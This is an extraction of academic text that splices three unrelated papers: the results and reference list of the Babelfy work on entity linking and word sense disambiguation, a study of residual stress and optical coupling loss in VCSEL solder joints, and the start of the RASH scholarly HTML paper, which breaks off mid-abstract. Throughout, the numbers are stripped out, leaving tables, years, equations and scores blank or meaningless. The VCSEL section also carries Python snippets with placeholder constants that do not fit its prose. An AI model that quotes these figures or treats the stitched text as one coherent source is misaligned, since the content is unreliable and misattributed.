we followed the original task formulation and evaluated the synsets in three different settings, i.e., ./ukb wsd -d dict.txt -k kb.bin --ppr w w ctx.txt when using babelnet senses, wikipedia senses and wordnet senses, thanks to babelnet being a super- set of the other two inventories. we ran our sys- tem on a document-by-document basis, i.e., disam- biguating each document at once, so as to test its effectiveness on long coherent texts. performance was calculated in terms of f score. we also com- pared the systems with the mfs baseline computed for the three inventories (navigli et al., ). coarse-grained wsd. for the semeval- task we compared our system with the two top- ranked approaches, i.e., nus-pt (chan et al., ) and uor-ssi (navigli, ), which respectively exploited parallel texts and enriched semantic paths in a semantic network, the previously described ukb w w system, a knowledge-based wsd ap- proach (ponzetto and navigli, ) which exploits an automatic extension of wordnet, and, as base- line, the mfs. fine-grained wsd. for the remaining fine- grained wsd datasets, i.e., senseval- and semeval- task , we compared our approach with the previously described state-of-the-art systems ukb and ims, and, as baseline, the mfs. kore and aida-conll. for the kore and aida-conll datasets we compared our sys- tem with six approaches, including state-of-the-art ones (hoffart et al., ; cornolti et al., ): • mw, i.e., the normalized google distance as defined by milne and witten ( ); • kpcs (hoffart et al., ), which calcu- lates a mutual information weighted vector of keyphrases for each candidate and then uses the cosine similarity to obtain candidates’ scores; • kore and its variants korelsh−g and korelsh−f (hoffart et al., ), based on similarity measures that exploit the overlap be- tween phrases associated with the considered entities (kore) and a hashing technique to re- duce the space needed by the keyphrases asso- ciated with the entities (lsh-g, lsh-f); • tagme . (ferragina and scaiella, ) which uses the relatedness measure defined we report the results as given by agirre et al. ( ). we used the out-of-the-box restful api available at http://tagme.di.unipi.it sens sem semeval- english french german italian spanish system wn wn wn wiki bn wiki bn wiki bn wiki bn wiki bn babelfy . . . . . . ? . . . . . . . ims . . . – – – – – – – – – – ukb w w ? . ? . . – . – . – . – . – . umcc-dlsi – – . . . ? . . ? . . ? . . ? . . daebak! – – – – . – . – . – ? . – . getalp-bn – – . – . – . – . – . – . mfs . . ? . ? . ? . . . . ? . . . . ? . babelfy unif. weights . . . . . . . . . . . . . babelfy w/o dens. sub. . . . . . . . . . . . . . babelfy only concepts . . . . . . . . . . . . . babelfy on sentences . . . . . . . . . . . . . table : f scores (percentages) of the participating systems of semeval- task together with mfs, ukb w w, ims, our system and its ablated versions on the senseval- , semeval- task and semeval- datasets. the first system which has a statistically significant difference from the top system is marked with ? (χ , p < . ). 
by milne and witten ( ) weighted with the commonness of a sense together with the keyphraseness measure defined by mihal- cea and csomai ( ) to exploit the context around the target word; • illinois wikifier (cheng and roth, ) which combines local features, such as com- monness and tf-idf between mentions and wikipedia pages, with global coherence fea- tures based on wikipedia links and relational inference; • dbpedia spotlight (mendes et al., ) which uses lingpipe’s string matching algo- rithm implementation together with a weighted cosine similarity measure to recognize and dis- ambiguate mentions. we also compared with ukb w w, introduced above. note that we could not use supervised sys- tems, as the training data of aida-conll covers less than half of the mentions used in the testing part and less than % of the entities considered in kore . to enable a fair comparison, we ran our system by restricting the babelnet sense inventory of the target mentions to the english wikipedia. as is customary in the literature, we calculated the sys- tems’ accuracy for both entity linking datasets. we used the out-of-the-box java api available from http://cogcomp.cs.illinois.edu/page/download view/wikifier we used the version of dbpedia spotlight as it ob- tains better scores on the considered datasets in comparison to the new version (daiber et al., ). we used the out-of-the- box restful api available at http://spotlight.dbpedia.org results multilingual wsd. in table we show the f performance on the semeval- task for the three setups: wordnet, wikipedia and babelnet. using babelnet we surpass all systems on english and german and obtain performance comparable with the best systems on two other languages (ukb on italian and umcc-dlsi on spanish). using the wordnet sense inventory, our results are on a par with the best system, i.e., ims. on wikipedia our results range between . % (french) and . % f (english), i.e., more than points higher than the current state of the art (umcc-dlsi) in all lan- guages. as for the mfs baseline, which is known to be very competitive in wsd (navigli, ), we beat it in all setups except for german on wikipedia. interestingly, we surpass the wordnet mfs by . points, a significant result for a knowledge-based system (see also (pilehvar and navigli, )). coarse- and fine-grained wsd. in table , we show the results of the systems on the semeval- coarse-grained wsd dataset. as can be seen, we obtain the second best result after ponzetto and navigli ( ). in table (first two columns), we show the results of ims and ukb on the senseval- and semeval- task datasets. we rank second on both datasets after ims. however, the differences are not statistically significant. moreover, agirre et al. ( , table ) note that using wordnet . , in- stead of . or . , to annotate these datasets can cause a more than one percent drop in performance. system f (ponzetto and navigli, ) . babelfy . uor-ssi . ukb w w . nus-pt ? . mfs . babelfy unif. weights . babelfy w/o dens. sub. . babelfy only concepts . babelfy on sentences . table : f score (percentages) on the semeval- task . the first system which has a statistically signifi- cant difference from the top system is marked with ? (χ , p < . ). entity linking. in table we show the results on the two entity linking datasets, i.e., kore and aida-conll. our system outperforms all other approaches, with kore-lsh-g getting closest, and tagme and wikifier lagging behind on the kore dataset. 
for the aida-conll dataset we obtain the third best performance after mw and kpcs, how- ever the difference is not statistically significant. we note the low performance of dbpedia spot- light which, even if it achieves almost % preci- sion on the identified mentions on both datasets, suf- fers from low recall due to its candidate identifica- tion step, confirming previous evaluations (derczyn- ski et al., ; hakimov et al., ; ludwig and sack, ). this problem becomes even more ac- centuated in the latest version of this system (daiber et al., ). finally, ukb using babelnet obtains low performance on el, i.e., . - . points below the state of the art. this result is discussed below. discussion. the results obtained by ukb show that the high performance of our unified approach to el and wsd is not just a mere artifact of the use of a rich multilingual semantic network, that is, ba- belnet. in other words, it is not true that any graph- based algorithm could be applied to perform both el and wsd at the same time equally well. this also shows that babelnet by itself is not sufficient for achieving high performances for both tasks and that, instead, an appropriate processing of the struc- tural and lexical information of the semantic net- work is needed. a manual analysis revealed that the main cause of error for ukb in the el setup stems system kore conll babelfy . . kore-lsh-g . . kore . ? . mw ? . . tagme . . kpcs . . kore-lsh-f . . ukb w w (on babelnet) . . illinois wikifier . . dbpedia spotlight . . babelfy unif. weights . . babelfy w/o dens. sub. . . babelfy only ne . . table : accuracy (percentages) of state-of-the-art el systems and our system on kore and aida-conll. the first system with a statistically significant difference from the top system is marked with ? (χ , p < . ). from its inability to enforce high coherence, e.g., by jointly disambiguating all the words, which is in- stead needed when considering the high level of am- biguity that we have in our semantic interpretation graph (cucerzan, ). for instance, for sentence ( ) in the introduction, ukb disambiguates thomas as a cricket player and mario as the popular video game rather than the two well-known soccer play- ers, and munich as the german city, rather than the soccer team in which they play. our approach, in- stead, by enforcing highly coherent semantic inter- pretations, correctly identifies all the soccer-related entities. in order to determine the need of our loose candi- date identification heuristic (see section ), we com- pared the percentage of times a candidate set con- tains the correct entity against that obtained by an exact string matching between the mention and the sense inventory. on kore , our heuristic retrieves the correct entity . % of the time vs. . % when exact matching is used. this demonstrates the inad- equacy of exact matching for el, and the need for a comprehensive sense inventory, as is done in our approach. we also performed different ablation tests by ex- perimenting with the following variants of our sys- tem (reported at the bottom of tables , and ): • babelfy using uniform distribution during the rwr to obtain the concepts’ semantic sig- natures; this test assesses the impact of our weighting and edge creation strategy. • babelfy without performing the densest sub- graph heuristic, i.e., when line in algorithm is g?i = gi , so as to verify the impact of identifying the most coherent interpretations. 
• babelfy applied to the babelnet subgraph in- duced by the entire set of named entity ver- tices, for the el task, and that induced by word senses only, for the wsd task; this test aims to stress the impact of our unified approach. • babelfy applied on sentences instead of on whole documents. the component which has a smaller impact on the performance is our triangle-based weighting scheme. the main exception is on the smallest dataset, i.e., semeval- task , for which this version attains an improvement of . percentage points. babelfy without the densest subgraph algorithm is the version which attains the lowest performances on the el task, with a % performance drop on the kore dataset, showing the need for a specially designed approach to cope with the high level of am- biguity that is encountered on this task. on the other hand, in the wsd datasets this version attains almost the same results as the full version, due to the lower number of candidate word senses. babelfy applied on sentences instead of on whole documents shows a lower performance, confirm- ing the significance of higher semantic coherence on whole documents (notwithstanding the two ex- ceptions on the semeval- task and on the semeval- german wikipedia datasets). finally, the version in which we restrict our system to named entities only (for el) and con- cepts only (for wsd) consistently obtains lower re- sults (notwithstanding the three exceptions on the spanish semeval- task using babelnet and wikipedia, and on the semeval coarse-grained task). this highlights the benefit of our joint use of lexicographic and encyclopedic structured knowl- edge, on each of the two tasks. the . % per- formance drop attained on kore is of particu- lar interest, since this dataset aims at testing perfor- mance on highly ambiguous mentions within short sentences. this indicates that the semantic analysis of small contexts can be improved by leveraging the coherence between concepts and named entities. conclusion in this paper we presented babelfy, a novel, integrated approach to entity linking and word sense disambiguation, available at http://babelfy.org. our joint solution is based on three key steps: i) the automatic creation of semantic signatures, i.e., related concepts and named entities, for each node in the reference semantic network; ii) the unconstrained identifica- tion of candidate meanings for all possible textual fragments; iii) linking based on a high-coherence densest subgraph algorithm. we used babelnet . . as our multilingual semantic network. our graph-based approach exploits the semantic network structure to its advantage: two key features of babelnet, that is, its multilinguality and its in- tegration of lexicographic and encyclopedic knowl- edge, make it possible to run our general, unified ap- proach on the two tasks of entity linking and wsd in any of the languages covered by the semantic net- work. however, we also demonstrated that babel- net in itself does not lead to state-of-the-art accu- racy on both tasks, even when used in conjunction with a high-performance graph-based algorithm like personalized pagerank. this shows the need for our novel unified approach to el and wsd. 
at the core of our approach lies the effective treat- ment of the high degree of ambiguity of partial tex- tual mentions by means of a -approximation algo- rithm for the densest subgraph problem, which en- ables us to output a semantic interpretation of the input text with drastically reduced ambiguity, as was previously done with ssi (navigli, ). our experiments on six gold-standard datasets show the state-of-the-art performance of our ap- proach, as well as its robustness across languages. our evaluation also demonstrates that our approach fares well both on long texts, such as those of the wsd tasks, and short and highly-ambiguous sen- tences, such as the ones in kore . finally, abla- tion tests and further analysis demonstrate that each component of our system is needed to contribute state-of-the-art performances on both el and wsd. as future work, we plan to use babelfy for in- formation extraction, where semantics is taking the lead (moro and navigli, ), and for the valida- tion of semantic annotations (vannella et al., ). acknowledgments the authors gratefully acknowl- edge the support of the erc start- ing grant multijedi no. . references eneko agirre and aitor soroa. . personalizing pagerank for word sense disambiguation. in proc. of eacl, pages – . eneko agirre, david martı́nez, oier lópez de lacalle, and aitor soroa. . two graph-based algorithms for state-of-the-art wsd. in proc. of emnlp, pages – . eneko agirre, aitor soroa, and mark stevenson. . graph-based word sense disambiguation of biomedi- cal documents. bioinformatics, ( ): – . eneko agirre, oier lopez de lacalle, and aitor soroa. . random walks for knowledge-based word sense disambiguation. computational linguistics, ( ): – . sören auer, christian bizer, georgi kobilarov, jens lehmann, richard cyganiak, and zachary ives. . dbpedia: a nucleus for a web of open data. in proc. of iswc/aswc, pages – . carmen banea and rada mihalcea. . word sense disambiguation with multilingual features. in proc. of iwcs, pages – . christoph böhm, gerard de melo, felix naumann, and gerhard weikum. . linda: distributed web-of- data-scale entity matching. in proc. of cikm, pages – . samuel brody and mirella lapata. . bayesian word sense induction. in proc. of eacl, pages – . razvan c. bunescu and marius pasca. . using en- cyclopedic knowledge for named entity disambigua- tion. in proc. of eacl, pages – . yee seng chan, hwee tou ng, and zhi zhong. . nus-pt: exploiting parallel texts for word sense disambiguation in the english all-words tasks. in proc. of semeval- , pages – . moses charikar. . greedy approximation algo- rithms for finding dense components in a graph. in proc. of approx, pages – . xiao cheng and dan roth. . relational inference for wikification. in proc. of emnlp, pages – . marco cornolti, paolo ferragina, and massimiliano cia- ramita. . a framework for benchmarking entity- annotation systems. in proc. of www, pages – . silviu cucerzan. . large-scale named entity dis- ambiguation based on wikipedia data. in proc. of emnlp-conll, pages – . joachim daiber, max jakob, chris hokamp, and pablo n. mendes. . improving efficiency and accuracy in multilingual entity extraction. in proc. of i-semantics, pages – . leon derczynski, diana maynard, niraj aswani, and kalina bontcheva. . microblog-genre noise and impact on semantic annotation accuracy. in proc. of hypertext, pages – . antonio di marco and roberto navigli. . cluster- ing and diversifying web search results with graph- based word sense induction. 
computational linguis- tics, ( ): – . nicolai erbs, torsten zesch, and iryna gurevych. . link discovery: a comprehensive analysis. in proc. of icsc, pages – . oren etzioni, michele banko, and michael j cafarella. . machine reading. in proc. of aaai, pages – . uriel feige, guy kortsarz, and david peleg. . the dense k-subgraph problem. algorithmica, : . christiane fellbaum. . wordnet: an electronic lexical database. mit press. paolo ferragina and ugo scaiella. . tagme: on-the-fly annotation of short text fragments (by wikipedia entities). in proc. of cikm, pages – . paolo ferragina and ugo scaiella. . fast and accu- rate annotation of short texts with wikipedia pages. ieee software, ( ): – . weiwei guo and mona t. diab. . combining orthogonal monolingual and multilingual sources of evidence for all words wsd. in proc. of acl, pages – . yoan gutiérrez, yenier castañeda, andy gonzález, rainel estrada, dennys d. piug, jose i. abreu, roger pérez, antonio fernández orquı́n, andrés montoyo, rafael muñoz, and franc camara. . umcc dlsi: reinforcing a ranking algorithm with sense frequencies and multidimensional semantic resources to solve multilingual word sense disam- biguation. in proc. of semeval- , pages – . ben hachey, will radford, joel nothman, matthew hon- nibal, and james r. curran. . evaluating en- tity linking with wikipedia. artificial intelligence, : – . sherzod hakimov, salih atilay oto, and erdogan dogdu. . named entity recognition and disambiguation using linked data and graph-based centrality scoring. in proc. of swim, pages : – : . taher h. haveliwala. . topic-sensitive pagerank. in proc. of www, pages – . johannes hoffart, mohamed amir yosef, ilaria bordino, hagen fürstenau, manfred pinkal, marc spaniol, bilyana taneva, stefan thater, and gerhard weikum. . robust disambiguation of named entities in text. in proc. of emnlp, pages – . johannes hoffart, stephan seufert, dat ba nguyen, mar- tin theobald, and gerhard weikum. . kore: keyphrase overlap relatedness for entity disambigua- tion. in proc. of cikm, pages – . johannes hoffart, fabian m suchanek, klaus berberich, and gerhard weikum. . yago : a spatially and temporally enhanced knowledge base from wikipedia. artificial intelligence, : – . eduard h. hovy, roberto navigli, and simone p. ponzetto. . collaboratively built semi-structured content and artificial intelligence: the story so far. artificial intelligence, : – . samir khuller and barna saha. . on finding dense subgraphs. in proc. of icalp, pages – . sayali kulkarni, amit singh, ganesh ramakrishnan, and soumen chakrabarti. . collective annotation of wikipedia entities in web text. in proc. of kdd, pages – . els lefever and véronique hoste. . semeval- task : cross-lingual word sense disambiguation. in proc. of semeval- , pages – . els lefever and véronique hoste. . semeval- task : cross-lingual word sense disambiguation. in proc. of semeval- , pages – . els lefever, véronique hoste, and martine de cock. . parasense or how to use parallel corpora for word sense disambiguation. in proc. of acl-hlt, pages – . michael e. lesk. . automatic sense disambigua- tion using machine readable dictionaries: how to tell a pine cone from an ice cream cone. in proc. of the international conference on systems documen- tation, pages – . nadine ludwig and harald sack. . named entity recognition for user-generated tags. in proc. of dexa, pages – . suresh manandhar, ioannis p. klapaftis, dmitriy dli- gach, and sameer s. pradhan. . semeval- task : word sense induction & disambiguation. in proc. 
of semeval- , pages – . steve l. manion and raazesh sainudiin. . dae- bak!: peripheral diversity for multilingual word sense disambiguation. in proc. of semeval- , pages – . pablo n. mendes, max jakob, andrés garcı́a-silva, and christian bizer. . dbpedia spotlight: shed- ding light on the web of documents. in proc. of i- semantics, pages – . rada mihalcea and andras csomai. . wikify!: link- ing documents to encyclopedic knowledge. in proc. of cikm, pages – . rada mihalcea and dan i moldovan. . extended wordnet: progress report. in proc. of naacl work- shop on wordnet and other lexical resources, pages – . rada mihalcea. . unsupervised large-vocabulary word sense disambiguation with graph-based algo- rithms for sequence data labeling. in proc. of hlt/emnlp, pages – . george a. miller, claudia leacock, randee tengi, and ross t. bunker. . a semantic concordance. in proc. of hlt, pages – . tristan miller, chris biemann, torsten zesch, and iryna gurevych. . using distributional similarity for lexical expansion in knowledge-based word sense disambiguation. in proc. of coling, pages – . david milne and ian h. witten. . learning to link with wikipedia. in proc. of cikm, pages – . andrea moro and roberto navigli. . integrating syntactic and semantic analysis into the open infor- mation extraction paradigm. in proc. of ijcai, pages – . roberto navigli and mirella lapata. . an experi- mental study of graph connectivity for unsupervised word sense disambiguation. tpami, ( ): – . roberto navigli and simone paolo ponzetto. a. ba- belnet: the automatic construction, evaluation and application of a wide-coverage multilingual semantic network. artificial intelligence, : – . roberto navigli and simone paolo ponzetto. b. joining forces pays off: multilingual joint word sense disambiguation. in proc. of emnlp, pages – . roberto navigli, kenneth c. litkowski, and orin har- graves. . semeval- task : coarse- grained english all-words task. in proc. of semeval- , pages – . roberto navigli, david jurgens, and daniele vannella. . semeval- task : multilingual word sense disambiguation. in proc. of semeval- , pages – . roberto navigli. . a structural approach to the automatic adjudication of word sense disagreements. natural language engineering, ( ): – . roberto navigli. . word sense disambiguation: a survey. acm computing surveys, ( ): – . roberto navigli. . a quick tour of word sense disambiguation, induction and related approaches. in proc. of sofsem, pages – . hwee tou ng and hian beng lee. . integrat- ing multiple knowledge sources to disambiguate word sense: an exemplar-based approach. in proc. of acl, pages – . mohammad taher pilehvar and roberto navigli. . a large-scale pseudoword-based evaluation frame- work for state-of-the-art word sense disambigua- tion. computational linguistics. simone p. ponzetto and roberto navigli. . knowledge-rich word sense disambiguation rivaling supervised system. in proc. of acl, pages – . sameer s. pradhan, edward loper, dmitriy dligach, and martha palmer. . semeval- task : en- glish lexical sample, srl and all words. in proc. of semeval- , pages – . association for compu- tational linguistics. delip rao, paul mcnamee, and mark dredze. . en- tity linking: finding extracted entities in a knowl- edge base. in multi-source, multilingual information extraction and summarization, theory and applica- tions of natural language processing, pages – . springer berlin heidelberg. lev-arie ratinov, dan roth, doug downey, and mike anderson. . 
local and global algorithms for disambiguation to wikipedia. in proc. of acl, pages – . lenhart k. schubert. . turing’s dream and the knowledge challenge. in proc. of ncai, pages – . didier schwab, andon tchechmedjiev, jérôme goulian, mohammad nasiruddin, gilles sérasset, and hervé blanchon. . getalp system: propagation of a lesk measure through an ant colony algorithm. in proc. of semeval- , pages – . hui shen, razvan bunescu, and rada mihalcea. . coarse to fine grained sense disambiguation in wikipedia. in proc. of *sem, pages – . ravi sinha and rada mihalcea. . unsupervised graph-based word sense disambiguation using mea- sures of word semantic similarity. in proc. of icsc, pages – . benjamin snyder and martha palmer. . the english all-words task. in proc. of senseval- , pages – . carlo strapparava and alessandro valitutti. . word- net affect: an affective extension of wordnet. in proc. of lrec, pages – . hanghang tong, christos faloutsos, and jia-yu pan. . fast random walk with restart and its appli- cations. in proc. of icdm, pages – . kristina toutanova, dan klein, christopher d. manning, and yoram singer. . feature-rich part-of-speech tagging with a cyclic dependency network. in proc. of naacl-hlt, pages – . george tsatsaronis, michalis vazirgiannis, and ion an- droutsopoulos. . word sense disambiguation with spreading activation networks generated from thesauri. in proc. of ijcai, pages – . tim van de cruys and marianna apidianaki. . la- tent semantic word sense induction and disambigua- tion. in proc. of acl, pages – . daniele vannella, david jurgens, daniele scarfini, domenico toscani, and roberto navigli. . vali- dating and extending semantic knowledge bases us- ing video games with a purpose. in proc. of acl. duncan j. watts and steven h. strogatz. . col- lective dynamics of ’small-world’ networks. nature, ( ): – . zhi zhong and hwee tou ng. . it makes sense: a wide-coverage word sense disambiguation system for free text. in proc. of acl (demo), pages – . amal zouaq, michel gagnon, and benoit ozell. . a sumo-based semantic analysis for knowledge ex- traction. in proc of ltc. stress distribution and alignment shift analyses in the vcsel the effect of residual stress on coupling power loss of vcsel modulus jao-hwa kuang , chao-ming hsu , ah-der lin , jyun-wei luo .dept. of mech. and electro-mech. engr., national sun yat-sen univ., kuang@faculty.nsysu.edu.tw .dept. of mech. engr., national kaohsiung univ. of app. sci., jammy@cc.kuas.edu.tw .dept. of mech. engr., cheng-shiu univ.,ader@csu.edu.tw kaohsiung, taiwan abstract. in this article, the effect of residual stress on active region misalignment of laser light sources for vertical cavity surface emitting laser (vcsel) modulus has been studied. the post-weld-shift variation of active region introduced from the residual stress distribution variation for different vcsel solder joints, i.e. tin-silver (sn/ . ag) and tin-lead (sn/ pb) solder joints, are simulated by employing the thermal-elastic-plastic finite element model of marc package. the ball grid solidification in reflow process and the creep deformation in the acceleration aging were simulated and analyze. the time and temperature dependent material properties of solders are employed. numerical results indicate that the post-weld-shift introduced from residual stress in the solidification process are significant, and are also the key reasons to reduce the coupling efficiency in vcsel packaging. 
the non-sequential components models in commercial zemax optical package were used to estimate the optical coupling power loss between the active region and the fiber tip in vscel modulus. the results show that the proposed post-weld-shift model is feasible to analyze and to improve the solder joint design in the vcsel packaging. keywords: vcsel, fem , creep , residual stresses, misalignment. . introduction manufactured by geas, the vcsel modulus is an active opto-electronic device, and quite different from traditional laser diodes [ ]. it has a compact volume coupled with fiber by circle beam, and is made in an arrayed form for better fiber communications [ ] [ ]. the optical coupled power of a vcsel modulus depends upon residual stress distribution and the corresponding pws (post-weld shift) after the reflow process [ ]. to ensure the reliability of the vcsel modulus for temperature-fluctuating operations, the endurance tests are necessary and versatile [ ]. the notable item is the acceleration aging test. in the test, the thermal stresses dominate the vcsel modulus deformation which induces the active region misalignment for vcsel. the misalignment has a strong influence on the optical coupled power loss [ ]. basically, the vcsel modulus is classified into three parts; vcsel structure, micro-solder ball and silicon bench (substrate), as shown in figure . the dimensions of vcsel modulus are x x µm. the sizes of a vcsel structure are x x . µm. in the opto-electronic packaging, solder surface mounted technology (smt) is used to connect the components [ ]. to assemble the vcsel modulus, smt uses different solder ball joints, such as sn/ pb and sn/ . ag solders. of particular interest, the pad design is the layout for laser sources, layers mounting markers, and solder ball positioning, etc. (a) vcsel modulus (b) details of vcsel structure fig. schematic illustrations of vcsel in this study, both sn/ pb and sn/ . ag solders are simulated. the residual stresses for both solders are calculated for the reflow process and acceleration aging test. the coefficient of thermal expansion (cte) of gaas is two times as that of silicon. due to the cte difference between gaas and si, the residual stress has great influence on the yielding and misalignment of vcsel. the effect of creeping is included in the acceleration aging test. the active region misalignment induced by the residual stress will be investigated for evaluating the optical coupled power loss for vcsel. fig. finite element mesh model for vcsel modulus . finite element model for vcsel modulus surface evolver simulating the solder solidification process is used to predict the shape of solder during the reflow process. the reflowed solder shape will be reconstructed in the finite element package of msc, marc. figure shows the vcsel mesh model symmetric about yz-plane. the substrate is made of pure silicon and its sizes are x x µm. the node number is for vcsel structure, for micro-solder ball, and for substrate, respectively. the laser sources in the vcsel structure indicated by points a are located at the center of the active region, as shown in figure (b). the primary composition of vcsel structure consists of gaas, au, pt and ti. considering the creeping effects, the power of first order is included in this study[ ]. on the boundary, the nature convection coefficient for a local area was proposed by ellison [ ] based upon experimental method. 
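the correlation given in the passage that follows has the form h = c · k · (Δt/l)^m, with orientation-dependent experience factors k and m and a characteristic length l. as a minimal sketch of how such a boundary condition could be evaluated (the numeric constants are not reproduced here, so the values below are placeholders rather than the ones used in the paper):

```python
def natural_convection_h(delta_t, length, k, m, c):
    # ellison-style correlation: h = c * k * (delta_t / length) ** m  [w/(m^2*degC)]
    # delta_t: temperature difference between boundary and ambient (degC)
    # length:  characteristic length of the plane (m)
    # k, m, c: empirical (experience) factors for the given plate orientation
    return c * k * (delta_t / length) ** m

# placeholder usage for a vertical plane whose characteristic length is its height
h = natural_convection_h(delta_t=80.0, length=0.0005, k=1.0, m=0.25, c=1.0)
print(round(h, 2), "w/(m^2*degC)")
```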
table lists the experience factors of the natural convection coefficient, which is set to a value of zero on the symmetric surface. the natural convection coefficient can be written as below: h = . k (Δt/l)^m (w/(m²·℃)), where h is the natural convection coefficient, Δt the temperature difference between boundary and environment (℃), m the first experience factor, k the second experience factor, and l the characteristic length (m). furthermore, the corners of the yz-plane (the symmetric plane) are fixed, and the other points of the yz-plane have no displacement in the x-direction. the material of the vcsel modulus follows the isotropic-hardening rule, the von mises yielding criterion, and the prandtl-reuss flow rule. the optical coupled power loss of the vcsel modulus is estimated by zemax using its powerful non-sequential module. the roughness of the reflection surface is close to the quality of a mirror, and the maximum clear aperture is µm. each laser source diode contains layout rays and analysis rays of mw. table (experience factors for convection by ellison [ ]; columns: characteristic plane, l, k, m): vertical plane: l = height, k = . , m = . ; horizontal plane (face up): l = a, k = . , m = . ; horizontal plane (face down): l = a, . ; note: a = length × width / ( × (length + width)). fig. (a) temperature profile, (b) residual stress distribution: reflow process for vcsel using sn/ pb solder joints. . numerical results and discussion in the simulation, the process sequence is the reflow process followed by the acceleration aging test. the temperature profile of the reflow process is shown in figure (a). the time period for a vcsel modulus is minutes in the reflow process. according to bellcore standard ta-tsa- , the acceleration aging test in this study has a temperature of ℃ maintained for hours. the residual stress distribution is then calculated and the corresponding displacement of the vcsel modulus is estimated. a coupled thermo-mechanical field is adopted in the numerical analysis. the joints of the vcsel structure use sn/ pb or sn/ . ag solder balls. the solder ball joint has a significant effect on the misalignment of the active region in view of the deformation induced by the residual stresses. figure (b) presents the residual stress distribution of the sn/ pb solder joints used by the vcsel modulus for the reflow process. after the reflow process, the maximum von mises stress is mpa and its position is marked by point p. it is found that point p is located at the interface between the solder joint and the pad, as shown in figure (b). as shown in figure , the stress variation of point p is calculated for the reflow process and for the acceleration aging test which follows it. it is observed that the stress of point p is close to zero at the melting point of the sn/ pb solder. in the solidification stage, the stress of point p rises and finally comes to a fixed value, the residual stress of point p. similarly, the residual stress is . mpa for the sn/ . ag solder joint. according to figure (b), the stress relaxation caused by creep is obvious. fig. (a) reflow process, (b) acceleration aging test (axes: von mises stress (mpa) and major principal stress (mpa) versus time): stress variation of point p for sn/ pb solder joints. fig. (a) reflow process, (b) acceleration aging test (axes: temperature (℃) and displacement (µm) versus time): displacement of point a of the vcsel using sn/ pb solder joints.
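the stresses quoted above (the maximum stress at point p and the residual stress of the sn/ . ag joint) are von mises equivalent values taken from the marc solution. purely as a reference for the yielding criterion used in the model, the sketch below shows how that scalar equivalent stress is obtained from a general three-dimensional stress state; it is the standard textbook expression, not code taken from the paper's analysis.

```python
import math

def von_mises(sx, sy, sz, txy, tyz, tzx):
    # von mises equivalent stress for a general 3-d stress state (same units in and out)
    return math.sqrt(0.5 * ((sx - sy) ** 2 + (sy - sz) ** 2 + (sz - sx) ** 2)
                     + 3.0 * (txy ** 2 + tyz ** 2 + tzx ** 2))

# example: uniaxial tension reduces to the applied stress itself
print(von_mises(100.0, 0.0, 0.0, 0.0, 0.0, 0.0))  # 100.0
```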
fig. (a) simulation model, (b) power distribution: simulation of zemax. as shown in figure , the optical coupled power loss is simulated by zemax. the fiber material is bk , with µm diameter and µm length; the core material is sf , with µm diameter and µm length. in industry, the initial alignment of the vcsel structure and the fiber is set to give the greatest power transmitting efficiency. then, through the reflow process, the vcsel structure and the fiber are joined. generally, the optical coupled power loss will increase with each process or test. according to the numerical simulation, the center of the active region, point a, has the greatest pws. the displacement and the corresponding optical coupled power loss are listed in table . according to the table, the displacement changes from . µm to . µm for the sn/ pb solder joints, and from . µm to . µm for the sn/ . ag. however, the optical coupled power loss increases from . % to % for the sn/ pb solder, and from . % to % for the sn/ . ag solder. table (active region displacement (µm) / optical coupled power loss for different solder ball grid array joints): reflow process only: sn/ pb . / . %, sn/ . ag . / . %; reflow process + aging test: sn/ pb . / %, sn/ . ag . / %. . conclusions in this study, the residual stress distribution and the deformation for sn/ pb and sn/ . ag ball grid arrays of vcsel were investigated. the corresponding optical coupled power loss was estimated from the displacement obtained by the finite element analysis. the simulated results reveal that both the post-solder-shift and the creep deformation may affect the coupling efficiency significantly. however, due to the higher melting point, the sn/ . ag ball grid array joint always provides better coupling efficiency than the sn/ pb joint during the acceleration aging test. references [ ] melanie ott, harry shaw, september , , "evaluation of vertical cavity emitting lasers (vcsel) mounted on diamond substrates," nasa/gsfc component technology and radiation effects branch. [ ] h. roscher and r. michalzik, "low thermal resistance flip-chip bonding of nm -d vcsel arrays capable of gbit/s/ch operation," in proc. ieee lasers and electro-opt. soc. ann. meet., leos, vol. , pp. - , tucson, az, usa, oct. [ ] r. michalzik, r. king, r. jäger, s. müller, and k. j. ebeling, "vcsel arrays for cmos integrated optical interconnect systems" (invited), in optoelectronic and wireless data management, processing, storage, and retrieval, r. raymond, p. k. srimani, r. su, and c. w. wilmsen (eds.), proc. spie, pp. - . [ ] anderson, t., guven, i., madenci, e., and gustafsson, g., "the necessity of reexamining previous life prediction analysis of solder joints in electronic packages," ieee, pp. - . [ ] pardeep k. b., klaus g., kwang, a. y., and ahmer r. s., "three-dimensional creep analysis of solder joints in surface mount devices," transactions of the asme, vol. , pp. - . [ ] amagai, m., "characterization of chip scale packaging materials," microelectronics reliability, vol. , pp. - . [ ] zarrow, p., soldering, smt, pp. - . [ ] lau, j. h. and pao, y. h., solder joint reliability of bga, csp, flip chip, and fine pitch smt assemblies, mcgraw-hill, new york, usa. [ ] ellison, gordon n., thermal computations for electronic equipment, robert e. krieger publishing co., malabar, florida.
submitted october accepted august published october corresponding author silvio peroni, silvio.peroni@unibo.it academic editor ciro cattuto additional information and declarations can be found on page doi . /peerj-cs. copyright peroni et al. distributed under creative commons cc-by . open access research articles in simplified html: a web-first format for html-based scholarly articles silvio peroni , francesco osborne , angelo di iorio , andrea giovanni nuzzolese , francesco poggi , fabio vitali and enrico motta digital and semantic publishing laboratory, department of computer science and engineering, university of bologna, bologna, italy knowledge media institute, open university, milton keynes, united kingdom semantic technologies laboratory, institute of cognitive sciences and technologies, italian national research council, rome, italy abstract purpose. this paper introduces the research articles in simplified html (or rash), which is a web-first format for writing html-based scholarly papers; it is accompanied by the rash framework, a set of tools for interacting with rash-based articles. the paper also presents an evaluation that involved authors and reviewers of rash articles submitted to the save-sd and save-sd workshops. design. rash has been developed aiming to: be easy to learn and use; share scholarly documents (and embedded semantic annotations) through the web; support its adoption within the existing publishing workflow. findings. the evaluation study confirmed that rash is ready to be adopted in workshops, conferences, and journals and can be quickly learnt by researchers who are familiar with html. research limitations. the evaluation study also highlighted some issues in the adoption of rash, and in general of html formats, especially by less technically savvy users. moreover, additional tools are needed, e.g., for enabling additional conversions from/to existing formats such as openxml. practical implications. rash (and its framework) is another step towards enabling the definition of formal representations of the meaning of the content of an article, facilitating its automatic discovery, enabling its linking to semantically related articles, providing access to data within the article in actionable form, and allowing integration of data between papers. social implications. rash addresses the intrinsic needs related to the various users of a scholarly article: researchers (focussing on its content), readers (experiencing new ways for browsing it), citizen scientists (reusing available data formally defined within it through semantic annotations), publishers (using the advantages of new technologies as envisioned by the semantic publishing movement). value. rash helps authors to focus on the organisation of their texts, supports them in the task of semantically enriching the content of 